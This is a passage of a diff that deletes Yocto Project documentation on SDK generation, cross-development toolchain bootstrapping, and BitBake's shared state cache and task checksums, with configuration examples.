-
-            <para>
-                In the
-                <link linkend='general-workflow-figure'>general workflow figure</link>,
-                the output labeled "Application Development SDK" represents an
-                SDK.
-                The SDK generation process differs depending on whether you
-                build an extensible SDK (e.g.
-                <filename>bitbake -c populate_sdk_ext</filename> <replaceable>imagename</replaceable>)
-                or a standard SDK (e.g.
-                <filename>bitbake -c populate_sdk</filename> <replaceable>imagename</replaceable>).
-                This section takes a closer look at this output:
-                <imagedata fileref="figures/sdk.png" align="center" width="9in" depth="7.25in" />
-            </para>
-
-            <para>
-                The specific form of this output is a set of files that
-                includes a self-extracting SDK installer
-                (<filename>*.sh</filename>), host and target manifest files,
-                and files used for SDK testing.
-                When the SDK installer file is run, it installs the SDK.
-                The SDK consists of a cross-development toolchain, a set of
-                libraries and headers, and an SDK environment setup script.
-                Running this installer essentially sets up your
-                cross-development environment.
-                You can think of the cross-toolchain as the "host"
-                part because it runs on the SDK machine.
-                You can think of the libraries and headers as the "target"
-                part because they are built for the target hardware.
-                The environment setup script is added so that you can
-                initialize the environment before using the tools.
-            </para>
-
-            <note><title>Notes</title>
-                <itemizedlist>
-                    <listitem><para>
-                        The Yocto Project supports several methods by which
-                        you can set up this cross-development environment.
-                        These methods include downloading pre-built SDK
-                        installers or building and installing your own SDK
-                        installer.
-                        </para></listitem>
-                    <listitem><para>
-                        For background information on cross-development
-                        toolchains in the Yocto Project development
-                        environment, see the
-                        "<link linkend='cross-development-toolchain-generation'>Cross-Development Toolchain Generation</link>"
-                        section.
-                        </para></listitem>
-                    <listitem><para>
-                        For information on setting up a cross-development
-                        environment, see the
-                        <ulink url='&YOCTO_DOCS_SDK_URL;'>Yocto Project Application Development and the Extensible Software Development Kit (eSDK)</ulink>
-                        manual.
-                        </para></listitem>
-                </itemizedlist>
-            </note>
-
-            <para>
-                All the output files for an SDK are written to the
-                <filename>deploy/sdk</filename> folder inside the
-                <ulink url='&YOCTO_DOCS_REF_URL;#build-directory'>Build Directory</ulink>
-                as shown in the previous figure.
-                Depending on the type of SDK, several variables exist that help
-                configure these files.
-                The following list shows the variables associated with an
-                extensible SDK:
-                <itemizedlist>
-                    <listitem><para>
-                        <ulink url='&YOCTO_DOCS_REF_URL;#var-DEPLOY_DIR'><filename>DEPLOY_DIR</filename></ulink>:
-                        Points to the <filename>deploy</filename> directory.
-                        </para></listitem>
-                    <listitem><para>
-                        <ulink url='&YOCTO_DOCS_REF_URL;#var-SDK_EXT_TYPE'><filename>SDK_EXT_TYPE</filename></ulink>:
-                        Controls whether or not shared state artifacts are
-                        copied into the extensible SDK.
-                        By default, all required shared state artifacts are
-                        copied into the SDK.
-                        </para></listitem>
-                    <listitem><para>
-                        <ulink url='&YOCTO_DOCS_REF_URL;#var-SDK_INCLUDE_PKGDATA'><filename>SDK_INCLUDE_PKGDATA</filename></ulink>:
-                        Specifies whether or not packagedata is included in the
-                        extensible SDK for all recipes in the "world" target.
-                        </para></listitem>
-                    <listitem><para>
-                        <ulink url='&YOCTO_DOCS_REF_URL;#var-SDK_INCLUDE_TOOLCHAIN'><filename>SDK_INCLUDE_TOOLCHAIN</filename></ulink>:
-                        Specifies whether or not the toolchain is included
-                        when building the extensible SDK.
-                        </para></listitem>
-                    <listitem><para>
-                        <ulink url='&YOCTO_DOCS_REF_URL;#var-SDK_LOCAL_CONF_WHITELIST'><filename>SDK_LOCAL_CONF_WHITELIST</filename></ulink>:
-                        A list of variables allowed through from the build
-                        system configuration into the extensible SDK
-                        configuration.
-                        </para></listitem>
-                    <listitem><para>
-                        <ulink url='&YOCTO_DOCS_REF_URL;#var-SDK_LOCAL_CONF_BLACKLIST'><filename>SDK_LOCAL_CONF_BLACKLIST</filename></ulink>:
-                        A list of variables not allowed through from the build
-                        system configuration into the extensible SDK
-                        configuration.
-                        </para></listitem>
-                    <listitem><para>
-                        <ulink url='&YOCTO_DOCS_REF_URL;#var-SDK_INHERIT_BLACKLIST'><filename>SDK_INHERIT_BLACKLIST</filename></ulink>:
-                        A list of classes to remove from the
-                        <ulink url='&YOCTO_DOCS_REF_URL;#var-INHERIT'><filename>INHERIT</filename></ulink>
-                        value globally within the extensible SDK configuration.
-                        </para></listitem>
-                </itemizedlist>
-                This next list, shows the variables associated with a standard
-                SDK:
-                <itemizedlist>
-                    <listitem><para>
-                        <ulink url='&YOCTO_DOCS_REF_URL;#var-DEPLOY_DIR'><filename>DEPLOY_DIR</filename></ulink>:
-                        Points to the <filename>deploy</filename> directory.
-                        </para></listitem>
-                    <listitem><para>
-                        <ulink url='&YOCTO_DOCS_REF_URL;#var-SDKMACHINE'><filename>SDKMACHINE</filename></ulink>:
-                        Specifies the architecture of the machine on which the
-                        cross-development tools are run to create packages for
-                        the target hardware.
-                        </para></listitem>
-                    <listitem><para>
-                        <ulink url='&YOCTO_DOCS_REF_URL;#var-SDKIMAGE_FEATURES'><filename>SDKIMAGE_FEATURES</filename></ulink>:
-                        Lists the features to include in the "target" part
-                        of the SDK.
-                        </para></listitem>
-                    <listitem><para>
-                        <ulink url='&YOCTO_DOCS_REF_URL;#var-TOOLCHAIN_HOST_TASK'><filename>TOOLCHAIN_HOST_TASK</filename></ulink>:
-                        Lists packages that make up the host part of the SDK
-                        (i.e. the part that runs on the
-                        <filename>SDKMACHINE</filename>).
-                        When you use
-                        <filename>bitbake -c populate_sdk <replaceable>imagename</replaceable></filename>
-                        to create the SDK, a set of default packages apply.
-                        This variable allows you to add more packages.
-                        </para></listitem>
-                    <listitem><para>
-                        <ulink url='&YOCTO_DOCS_REF_URL;#var-TOOLCHAIN_TARGET_TASK'><filename>TOOLCHAIN_TARGET_TASK</filename></ulink>:
-                        Lists packages that make up the target part of the SDK
-                        (i.e. the part built for the target hardware).
-                        </para></listitem>
-                    <listitem><para>
-                        <ulink url='&YOCTO_DOCS_REF_URL;#var-SDKPATH'><filename>SDKPATH</filename></ulink>:
-                        Defines the default SDK installation path offered by
-                        the installation script.
-                        </para></listitem>
-                    <listitem><para>
-                        <ulink url='&YOCTO_DOCS_REF_URL;#var-SDK_HOST_MANIFEST'><filename>SDK_HOST_MANIFEST</filename></ulink>:
-                        Lists all the installed packages that make up the host
-                        part of the SDK.
-                        This variable also plays a minor role for extensible
-                        SDK development as well.
-                        However, it is mainly used for the standard SDK.
-                        </para></listitem>
-                    <listitem><para>
-                        <ulink url='&YOCTO_DOCS_REF_URL;#var-SDK_TARGET_MANIFEST'><filename>SDK_TARGET_MANIFEST</filename></ulink>:
-                        Lists all the installed packages that make up the
-                        target part of the SDK.
-                        This variable also plays a minor role for extensible
-                        SDK development as well.
-                        However, it is mainly used for the standard SDK.
-                        </para></listitem>
-                </itemizedlist>
-            </para>
-        </section>
-    </section>
-
-    <section id="cross-development-toolchain-generation">
-        <title>Cross-Development Toolchain Generation</title>
-
-        <para>
-            The Yocto Project does most of the work for you when it comes to
-            creating
-            <ulink url='&YOCTO_DOCS_REF_URL;#cross-development-toolchain'>cross-development toolchains</ulink>.
-            This section provides some technical background on how
-            cross-development toolchains are created and used.
-            For more information on toolchains, you can also see the
-            <ulink url='&YOCTO_DOCS_SDK_URL;'>Yocto Project Application Development and the Extensible Software Development Kit (eSDK)</ulink>
-            manual.
-        </para>
-
-        <para>
-            In the Yocto Project development environment, cross-development
-            toolchains are used to build images and applications that run
-            on the target hardware.
-            With just a few commands, the OpenEmbedded build system creates
-            these necessary toolchains for you.
-        </para>
-
-        <para>
-            The following figure shows a high-level build environment regarding
-            toolchain construction and use.
-        </para>
-
-        <para>
-            <imagedata fileref="figures/cross-development-toolchains.png" width="8in" depth="6in" align="center" />
-        </para>
-
-        <para>
-            Most of the work occurs on the Build Host.
-            This is the machine used to build images and generally work within
-            the the Yocto Project environment.
-            When you run
-            <ulink url='&YOCTO_DOCS_REF_URL;#bitbake-term'>BitBake</ulink>
-            to create an image, the OpenEmbedded build system
-            uses the host <filename>gcc</filename> compiler to bootstrap a
-            cross-compiler named <filename>gcc-cross</filename>.
-            The <filename>gcc-cross</filename> compiler is what BitBake uses to
-            compile source files when creating the target image.
-            You can think of <filename>gcc-cross</filename> simply as an
-            automatically generated cross-compiler that is used internally
-            within BitBake only.
-            <note>
-                The extensible SDK does not use
-                <filename>gcc-cross-canadian</filename> since this SDK
-                ships a copy of the OpenEmbedded build system and the sysroot
-                within it contains <filename>gcc-cross</filename>.
-            </note>
-        </para>
-
-        <para>
-            The chain of events that occurs when <filename>gcc-cross</filename> is
-            bootstrapped is as follows:
-            <literallayout class='monospaced'>
-     gcc -> binutils-cross -> gcc-cross-initial -> linux-libc-headers -> glibc-initial -> glibc -> gcc-cross -> gcc-runtime
-            </literallayout>
-            <itemizedlist>
-                <listitem><para>
-                    <filename>gcc</filename>:
-                    The build host's GNU Compiler Collection (GCC).
-                    </para></listitem>
-                <listitem><para>
-                    <filename>binutils-cross</filename>:
-                    The bare minimum binary utilities needed in order to run
-                    the <filename>gcc-cross-initial</filename> phase of the
-                    bootstrap operation.
-                    </para></listitem>
-                <listitem><para>
-                    <filename>gcc-cross-initial</filename>:
-                    An early stage of the bootstrap process for creating
-                    the cross-compiler.
-                    This stage builds enough of the <filename>gcc-cross</filename>,
-                    the C library, and other pieces needed to finish building the
-                    final cross-compiler in later stages.
-                    This tool is a "native" package (i.e. it is designed to run on
-                    the build host).
-                    </para></listitem>
-                <listitem><para>
-                    <filename>linux-libc-headers</filename>:
-                    Headers needed for the cross-compiler.
-                    </para></listitem>
-                <listitem><para>
-                    <filename>glibc-initial</filename>:
-                    An initial version of the Embedded GNU C Library
-                    (GLIBC) needed to bootstrap <filename>glibc</filename>.
-                    </para></listitem>
-                <listitem><para>
-                    <filename>glibc</filename>:
-                    The GNU C Library.
-                    </para></listitem>
-                <listitem><para>
-                    <filename>gcc-cross</filename>:
-                    The final stage of the bootstrap process for the
-                    cross-compiler.
-                    This stage results in the actual cross-compiler that
-                    BitBake uses when it builds an image for a targeted
-                    device.
-                    <note>
-                        If you are replacing this cross compiler toolchain
-                        with a custom version, you must replace
-                        <filename>gcc-cross</filename>.
-                    </note>
-                    This tool is also a "native" package (i.e. it is
-                    designed to run on the build host).
-                    </para></listitem>
-                <listitem><para>
-                    <filename>gcc-runtime</filename>:
-                    Runtime libraries resulting from the toolchain bootstrapping
-                    process.
-                    This tool produces a binary that consists of the
-                    runtime libraries need for the targeted device.
-                    </para></listitem>
-            </itemizedlist>
-        </para>
-
-        <para>
-            You can use the OpenEmbedded build system to build an installer for
-            the relocatable SDK used to develop applications.
-            When you run the installer, it installs the toolchain, which
-            contains the development tools (e.g.,
-            <filename>gcc-cross-canadian</filename>,
-            <filename>binutils-cross-canadian</filename>, and other
-            <filename>nativesdk-*</filename> tools),
-            which are tools native to the SDK (i.e. native to
-            <ulink url='&YOCTO_DOCS_REF_URL;#var-SDK_ARCH'><filename>SDK_ARCH</filename></ulink>),
-            you need to cross-compile and test your software.
-            The figure shows the commands you use to easily build out this
-            toolchain.
-            This cross-development toolchain is built to execute on the
-            <ulink url='&YOCTO_DOCS_REF_URL;#var-SDKMACHINE'><filename>SDKMACHINE</filename></ulink>,
-            which might or might not be the same
-            machine as the Build Host.
-            <note>
-                If your target architecture is supported by the Yocto Project,
-                you can take advantage of pre-built images that ship with the
-                Yocto Project and already contain cross-development toolchain
-                installers.
-            </note>
-        </para>
-
-        <para>
-            Here is the bootstrap process for the relocatable toolchain:
-            <literallayout class='monospaced'>
-     gcc -> binutils-crosssdk -> gcc-crosssdk-initial -> linux-libc-headers ->
-        glibc-initial -> nativesdk-glibc -> gcc-crosssdk -> gcc-cross-canadian
-            </literallayout>
-            <itemizedlist>
-                <listitem><para>
-                    <filename>gcc</filename>:
-                    The build host's GNU Compiler Collection (GCC).
-                    </para></listitem>
-                <listitem><para>
-                    <filename>binutils-crosssdk</filename>:
-                    The bare minimum binary utilities needed in order to run
-                    the <filename>gcc-crosssdk-initial</filename> phase of the
-                    bootstrap operation.
-                    </para></listitem>
-                <listitem><para>
-                    <filename>gcc-crosssdk-initial</filename>:
-                    An early stage of the bootstrap process for creating
-                    the cross-compiler.
-                    This stage builds enough of the
-                    <filename>gcc-crosssdk</filename> and supporting pieces so that
-                    the final stage of the bootstrap process can produce the
-                    finished cross-compiler.
-                    This tool is a "native" binary that runs on the build host.
-                    </para></listitem>
-                <listitem><para>
-                    <filename>linux-libc-headers</filename>:
-                    Headers needed for the cross-compiler.
-                    </para></listitem>
-                <listitem><para>
-                    <filename>glibc-initial</filename>:
-                    An initial version of the Embedded GLIBC needed to bootstrap
-                    <filename>nativesdk-glibc</filename>.
-                    </para></listitem>
-                <listitem><para>
-                    <filename>nativesdk-glibc</filename>:
-                    The Embedded GLIBC needed to bootstrap the
-                    <filename>gcc-crosssdk</filename>.
-                    </para></listitem>
-                <listitem><para>
-                    <filename>gcc-crosssdk</filename>:
-                    The final stage of the bootstrap process for the
-                    relocatable cross-compiler.
-                    The <filename>gcc-crosssdk</filename> is a transitory
-                    compiler and never leaves the build host.
-                    Its purpose is to help in the bootstrap process to create
-                    the eventual <filename>gcc-cross-canadian</filename>
-                    compiler, which is relocatable.
-                    This tool is also a "native" package (i.e. it is
-                    designed to run on the build host).
-                    </para></listitem>
-                <listitem><para>
-                    <filename>gcc-cross-canadian</filename>:
-                    The final relocatable cross-compiler.
-                    When run on the
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-SDKMACHINE'><filename>SDKMACHINE</filename></ulink>,
-                    this tool
-                    produces executable code that runs on the target device.
-                    Only one cross-canadian compiler is produced per architecture
-                    since they can be targeted at different processor optimizations
-                    using configurations passed to the compiler through the
-                    compile commands.
-                    This circumvents the need for multiple compilers and thus
-                    reduces the size of the toolchains.
-                    </para></listitem>
-            </itemizedlist>
-        </para>
-
-        <note>
-            For information on advantages gained when building a
-            cross-development toolchain installer, see the
-            "<ulink url='&YOCTO_DOCS_SDK_URL;#sdk-building-an-sdk-installer'>Building an SDK Installer</ulink>"
-            appendix in the Yocto Project Application Development and the
-            Extensible Software Development Kit (eSDK) manual.
-        </note>
-    </section>
-
-    <section id="shared-state-cache">
-        <title>Shared State Cache</title>
-
-        <para>
-            By design, the OpenEmbedded build system builds everything from
-            scratch unless
-            <ulink url='&YOCTO_DOCS_REF_URL;#bitbake-term'>BitBake</ulink>
-            can determine that parts do not need to be rebuilt.
-            Fundamentally, building from scratch is attractive as it means all
-            parts are built fresh and no possibility of stale data exists that
-            can cause problems.
-            When developers hit problems, they typically default back to
-            building from scratch so they have a know state from the
-            start.
-        </para>
-
-        <para>
-            Building an image from scratch is both an advantage and a
-            disadvantage to the process.
-            As mentioned in the previous paragraph, building from scratch
-            ensures that everything is current and starts from a known state.
-            However, building from scratch also takes much longer as it
-            generally means rebuilding things that do not necessarily need
-            to be rebuilt.
-        </para>
-
-        <para>
-            The Yocto Project implements shared state code that supports
-            incremental builds.
-            The implementation of the shared state code answers the following
-            questions that were fundamental roadblocks within the OpenEmbedded
-            incremental build support system:
-            <itemizedlist>
-                <listitem><para>
-                    What pieces of the system have changed and what pieces have
-                    not changed?
-                    </para></listitem>
-                <listitem><para>
-                    How are changed pieces of software removed and replaced?
-                    </para></listitem>
-                <listitem><para>
-                    How are pre-built components that do not need to be rebuilt
-                    from scratch used when they are available?
-                    </para></listitem>
-            </itemizedlist>
-        </para>
-
-        <para>
-            For the first question, the build system detects changes in the
-            "inputs" to a given task by creating a checksum (or signature) of
-            the task's inputs.
-            If the checksum changes, the system assumes the inputs have changed
-            and the task needs to be rerun.
-            For the second question, the shared state (sstate) code tracks
-            which tasks add which output to the build process.
-            This means the output from a given task can be removed, upgraded
-            or otherwise manipulated.
-            The third question is partly addressed by the solution for the
-            second question assuming the build system can fetch the sstate
-            objects from remote locations and install them if they are deemed
-            to be valid.
-            <note><title>Notes</title>
-                <itemizedlist>
-                    <listitem><para>
-                        The build system does not maintain
-                        <ulink url='&YOCTO_DOCS_REF_URL;#var-PR'><filename>PR</filename></ulink>
-                        information as part of the shared state packages.
-                        Consequently, considerations exist that affect
-                        maintaining shared state feeds.
-                        For information on how the build system works with
-                        packages and can track incrementing
-                        <filename>PR</filename> information, see the
-                       "<ulink url='&YOCTO_DOCS_DEV_URL;#automatically-incrementing-a-binary-package-revision-number'>Automatically Incrementing a Binary Package Revision Number</ulink>"
-                        section in the Yocto Project Development Tasks Manual.
-                        </para></listitem>
-                    <listitem><para>
-                        The code in the build system that supports incremental
-                        builds is not simple code.
-                        For techniques that help you work around issues related
-                        to shared state code, see the
-                        "<ulink url='&YOCTO_DOCS_DEV_URL;#dev-viewing-metadata-used-to-create-the-input-signature-of-a-shared-state-task'>Viewing Metadata Used to Create the Input Signature of a Shared State Task</ulink>"
-                        and
-                        "<ulink url='&YOCTO_DOCS_DEV_URL;#dev-invalidating-shared-state-to-force-a-task-to-run'>Invalidating Shared State to Force a Task to Run</ulink>"
-                        sections both in the Yocto Project Development Tasks
-                        Manual.
-                        </para></listitem>
-                </itemizedlist>
-            </note>
-        </para>
-
-        <para>
-            The rest of this section goes into detail about the overall
-            incremental build architecture, the checksums (signatures), and
-            shared state.
-        </para>
-
-        <section id='concepts-overall-architecture'>
-            <title>Overall Architecture</title>
-
-            <para>
-                When determining what parts of the system need to be built,
-                BitBake works on a per-task basis rather than a per-recipe
-                basis.
-                You might wonder why using a per-task basis is preferred over
-                a per-recipe basis.
-                To help explain, consider having the IPK packaging backend
-                enabled and then switching to DEB.
-                In this case, the
-                <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-install'><filename>do_install</filename></ulink>
-                and
-                <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-package'><filename>do_package</filename></ulink>
-                task outputs are still valid.
-                However, with a per-recipe approach, the build would not
-                include the <filename>.deb</filename> files.
-                Consequently, you would have to invalidate the whole build and
-                rerun it.
-                Rerunning everything is not the best solution.
-                Also, in this case, the core must be "taught" much about
-                specific tasks.
-                This methodology does not scale well and does not allow users
-                to easily add new tasks in layers or as external recipes
-                without touching the packaged-staging core.
-            </para>
-        </section>
-
-        <section id='overview-checksums'>
-            <title>Checksums (Signatures)</title>
-
-            <para>
-                The shared state code uses a checksum, which is a unique
-                signature of a task's inputs, to determine if a task needs to
-                be run again.
-                Because it is a change in a task's inputs that triggers a
-                rerun, the process needs to detect all the inputs to a given
-                task.
-                For shell tasks, this turns out to be fairly easy because
-                the build process generates a "run" shell script for each task
-                and it is possible to create a checksum that gives you a good
-                idea of when the task's data changes.
-            </para>
-
-            <para>
-                To complicate the problem, there are things that should not be
-                included in the checksum.
-                First, there is the actual specific build path of a given
-                task - the
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-WORKDIR'><filename>WORKDIR</filename></ulink>.
-                It does not matter if the work directory changes because it
-                should not affect the output for target packages.
-                Also, the build process has the objective of making native
-                or cross packages relocatable.
-                <note>
-                    Both native and cross packages run on the
-                    <ulink url='&YOCTO_DOCS_REF_URL;#hardware-build-system-term'>build host</ulink>.
-                    However, cross packages generate output for the target
-                    architecture.
-                </note>
-                The checksum therefore needs to exclude
-                <filename>WORKDIR</filename>.
-                The simplistic approach for excluding the work directory is to
-                set <filename>WORKDIR</filename> to some fixed value and
-                create the checksum for the "run" script.
-            </para>
-
-            <para>
-                Another problem results from the "run" scripts containing
-                functions that might or might not get called.
-                The incremental build solution contains code that figures out
-                dependencies between shell functions.
-                This code is used to prune the "run" scripts down to the
-                minimum set, thereby alleviating this problem and making the
-                "run" scripts much more readable as a bonus.
-            </para>
-
-            <para>
-                So far, solutions for shell scripts exist.
-                What about Python tasks?
-                The same approach applies even though these tasks are more
-                difficult.
-                The process needs to figure out what variables a Python
-                function accesses and what functions it calls.
-                Again, the incremental build solution contains code that first
-                figures out the variable and function dependencies, and then
-                creates a checksum for the data used as the input to the task.
-            </para>
-
-            <para>
-                Like the <filename>WORKDIR</filename> case, situations exist
-                where dependencies should be ignored.
-                For these situations, you can instruct the build process to
-                ignore a dependency by using a line like the following:
-                <literallayout class='monospaced'>
-     PACKAGE_ARCHS[vardepsexclude] = "MACHINE"
-                </literallayout>
-                This example ensures that the
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-PACKAGE_ARCHS'><filename>PACKAGE_ARCHS</filename></ulink>
-                variable does not depend on the value of
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-MACHINE'><filename>MACHINE</filename></ulink>,
-                even if it does reference it.
-            </para>
-
-            <para>
-                Equally, there are cases where you need to add dependencies
-                BitBake is not able to find.
-                You can accomplish this by using a line like the following:
-                <literallayout class='monospaced'>
-      PACKAGE_ARCHS[vardeps] = "MACHINE"
-                </literallayout>
-                This example explicitly adds the <filename>MACHINE</filename>
-                variable as a dependency for
-                <filename>PACKAGE_ARCHS</filename>.
-            </para>
-
-            <para>
-                As an example, consider a case with in-line Python where
-                BitBake is not able to figure out dependencies.
-                When running in debug mode (i.e. using
-                <filename>-DDD</filename>), BitBake produces output when it
-                discovers something for which it cannot figure out dependencies.
-                The Yocto Project team has currently not managed to cover
-                those dependencies in detail and is aware of the need to fix
-                this situation.
-            </para>
-
-            <para>
-                Thus far, this section has limited discussion to the direct
-                inputs into a task.
-                Information based on direct inputs is referred to as the
-                "basehash" in the code.
-                However, the question of a task's indirect inputs still
-                exits - items already built and present in the
-                <ulink url='&YOCTO_DOCS_REF_URL;#build-directory'>Build Directory</ulink>.
-                The checksum (or signature) for a particular task needs to add
-                the hashes of all the tasks on which the particular task
-                depends.
-                Choosing which dependencies to add is a policy decision.
-                However, the effect is to generate a master checksum that
-                combines the basehash and the hashes of the task's
-                dependencies.
-            </para>
-
-            <para>
-                At the code level, a variety of ways exist by which both the
-                basehash and the dependent task hashes can be influenced.
-                Within the BitBake configuration file, you can give BitBake
-                some extra information to help it construct the basehash.
-                The following statement effectively results in a list of
-                global variable dependency excludes (i.e. variables never
-                included in any checksum):
-                <literallayout class='monospaced'>
-     BB_HASHBASE_WHITELIST ?= "TMPDIR FILE PATH PWD BB_TASKHASH BBPATH DL_DIR \
-         SSTATE_DIR THISDIR FILESEXTRAPATHS FILE_DIRNAME HOME LOGNAME SHELL TERM \
-         USER FILESPATH STAGING_DIR_HOST STAGING_DIR_TARGET COREBASE PRSERV_HOST \
-         PRSERV_DUMPDIR PRSERV_DUMPFILE PRSERV_LOCKDOWN PARALLEL_MAKE \
-         CCACHE_DIR EXTERNAL_TOOLCHAIN CCACHE CCACHE_DISABLE LICENSE_PATH SDKPKGSUFFIX"
-                </literallayout>
-                The previous example excludes
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-WORKDIR'><filename>WORKDIR</filename></ulink>
-                since that variable is actually constructed as a path within
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-TMPDIR'><filename>TMPDIR</filename></ulink>,
-                which is on the whitelist.
-            </para>
-
-            <para>
-                The rules for deciding which hashes of dependent tasks to
-                include through dependency chains are more complex and are
-                generally accomplished with a Python function.
-                The code in <filename>meta/lib/oe/sstatesig.py</filename> shows
-                two examples of this and also illustrates how you can insert
-                your own policy into the system if so desired.
-                This file defines the two basic signature generators
-                <ulink url='&YOCTO_DOCS_REF_URL;#oe-core'>OE-Core</ulink>
-                uses:  "OEBasic" and "OEBasicHash".
-                By default, a dummy "noop" signature handler is enabled
-                in BitBake.
-                This means that behavior is unchanged from previous versions.
-                OE-Core uses the "OEBasicHash" signature handler by default
-                through this setting in the <filename>bitbake.conf</filename>
-                file:
-                <literallayout class='monospaced'>
-     BB_SIGNATURE_HANDLER ?= "OEBasicHash"
-                </literallayout>
-                The "OEBasicHash" <filename>BB_SIGNATURE_HANDLER</filename>
-                is the same as the "OEBasic" version but adds the task hash to
-                the
-                <link linkend='stamp-files-and-the-rerunning-of-tasks'>stamp files</link>.
-                This results in any metadata change that changes the task hash,
-                automatically causing the task to be run again.
-                This removes the need to bump
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-PR'><filename>PR</filename></ulink>
-                values, and changes to metadata automatically ripple across
-                the build.
-            </para>
-
-            <para>
-                It is also worth noting that the end result of these
-                signature generators is to make some dependency and hash
-                information available to the build.
-                This information includes:
-                <itemizedlist>
-                    <listitem><para>
-                        <filename>BB_BASEHASH_task-</filename><replaceable>taskname</replaceable>:
-                        The base hashes for each task in the recipe.
-                        </para></listitem>
-                    <listitem><para>
-                        <filename>BB_BASEHASH_</filename><replaceable>filename</replaceable><filename>:</filename><replaceable>taskname</replaceable>:
-                        The base hashes for each dependent task.
-                        </para></listitem>
-                    <listitem><para>
-                        <filename>BBHASHDEPS_</filename><replaceable>filename</replaceable><filename>:</filename><replaceable>taskname</replaceable>:
-                        The task dependencies for each task.
-                        </para></listitem>
-                    <listitem><para>
-                        <filename>BB_TASKHASH</filename>:
-                        The hash of the currently running task.
-                        </para></listitem>
-                </itemizedlist>
-            </para>
-        </section>
-
-        <section id='shared-state'>
-            <title>Shared State</title>
-
-            <para>
-                Checksums and dependencies, as discussed in the previous
-                section, solve half the problem of supporting a shared state.
-                The other half of the problem is being able to use checksum
-                information during the build and being able to reuse or rebuild
-                specific components.
-            </para>
-
-            <para>
-                The
-                <ulink url='&YOCTO_DOCS_REF_URL;#ref-classes-sstate'><filename>sstate</filename></ulink>
-                class is a relatively generic implementation of how to
-                "capture" a snapshot of a given task.
-                The idea is that the build process does not care about the
-                source of a task's output.
-                Output could be freshly built or it could be downloaded and
-                unpacked from somewhere.
-                In other words, the build process does not need to worry about
-                its origin.
-            </para>
-
-            <para>
-                Two types of output exist.
-                One type is just about creating a directory in
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-WORKDIR'><filename>WORKDIR</filename></ulink>.
-                A good example is the output of either
-                <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-install'><filename>do_install</filename></ulink>
-                or
-                <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-package'><filename>do_package</filename></ulink>.
-                The other type of output occurs when a set of data is merged
-                into a shared directory tree such as the sysroot.
-            </para>
-
-            <para>
-                The Yocto Project team has tried to keep the details of the
-                implementation hidden in <filename>sstate</filename> class.
-                From a user's perspective, adding shared state wrapping to a
-                task is as simple as this
-                <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-deploy'><filename>do_deploy</filename></ulink>
-                example taken from the
-                <ulink url='&YOCTO_DOCS_REF_URL;#ref-classes-deploy'><filename>deploy</filename></ulink>
-                class:
-                <literallayout class='monospaced'>
-     DEPLOYDIR = "${WORKDIR}/deploy-${PN}"
-     SSTATETASKS += "do_deploy"
-     do_deploy[sstate-inputdirs] = "${DEPLOYDIR}"
-     do_deploy[sstate-outputdirs] = "${DEPLOY_DIR_IMAGE}"
-
-     python do_deploy_setscene () {
-         sstate_setscene(d)
-     }
-     addtask do_deploy_setscene
-     do_deploy[dirs] = "${DEPLOYDIR} ${B}"
-     do_deploy[stamp-extra-info] = "${MACHINE_ARCH}"
-                </literallayout>
-                The following list explains the previous example:
-                <itemizedlist>
-                    <listitem><para>
-                        Adding "do_deploy" to <filename>SSTATETASKS</filename>
-                        adds some required sstate-related processing, which is
-                        implemented in the
-                        <ulink url='&YOCTO_DOCS_REF_URL;#ref-classes-sstate'><filename>sstate</filename></ulink>
-                        class, to before and after the
-                        <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-deploy'><filename>do_deploy</filename></ulink>
-                        task.
-                        </para></listitem>
-                    <listitem><para>
-                        The
-                        <filename>do_deploy[sstate-inputdirs] = "${DEPLOYDIR}"</filename>
-                        declares that <filename>do_deploy</filename> places its
-                        output in <filename>${DEPLOYDIR}</filename> when run
-                        normally (i.e. when not using the sstate cache).
-                        This output becomes the input to the shared state cache.
-                        </para></listitem>
-                    <listitem><para>
-                        The
-                        <filename>do_deploy[sstate-outputdirs] = "${DEPLOY_DIR_IMAGE}"</filename>
-                        line causes the contents of the shared state cache to be
-                        copied to <filename>${DEPLOY_DIR_IMAGE}</filename>.
-                        <note>
-                            If <filename>do_deploy</filename> is not already in
-                            the shared state cache or if its input checksum
-                            (signature) has changed from when the output was
-                            cached, the task runs to populate the shared
-                            state cache, after which the contents of the shared
-                            state cache is copied to
-                            <filename>${DEPLOY_DIR_IMAGE}</filename>.
-                            If <filename>do_deploy</filename> is in the shared
-                            state cache and its signature indicates that the
-                            cached output is still valid (i.e. if no
-                            relevant task inputs have changed), then the
-                            contents of the shared state cache copies
-                            directly to
-                            <filename>${DEPLOY_DIR_IMAGE}</filename> by the
-                            <filename>do_deploy_setscene</filename> task
-                            instead, skipping the
-                            <filename>do_deploy</filename> task.
-                        </note>
-                        </para></listitem>
-                    <listitem><para>
-                        The following task definition is glue logic needed to
-                        make the previous settings effective:
-                        <literallayout class='monospaced'>
-     python do_deploy_setscene () {
-         sstate_setscene(d)
-     }
-     addtask do_deploy_setscene
-                        </literallayout>
-                        <filename>sstate_setscene()</filename> takes the flags
-                        above as input and accelerates the
-                        <filename>do_deploy</filename> task through the
-                        shared state cache if possible.
-                        If the task was accelerated,
-                        <filename>sstate_setscene()</filename> returns True.
-                        Otherwise, it returns False, and the normal
-                        <filename>do_deploy</filename> task runs.
-                        For more information, see the
-                        "<ulink url='&YOCTO_DOCS_BB_URL;#setscene'>setscene</ulink>"
-                        section in the BitBake User Manual.
-                        </para></listitem>
-                    <listitem><para>
-                        The <filename>do_deploy[dirs] = "${DEPLOYDIR} ${B}"</filename>
-                        line creates <filename>${DEPLOYDIR}</filename> and
-                        <filename>${B}</filename> before the
-                        <filename>do_deploy</filename> task runs, and also sets
-                        the current working directory of
-                        <filename>do_deploy</filename> to
-                        <filename>${B}</filename>.
-                        For more information, see the
-                        "<ulink url='&YOCTO_DOCS_BB_URL;#variable-flags'>Variable Flags</ulink>"
-                        section in the BitBake User Manual.
-                        <note>
-                            In cases where
-                            <filename>sstate-inputdirs</filename> and
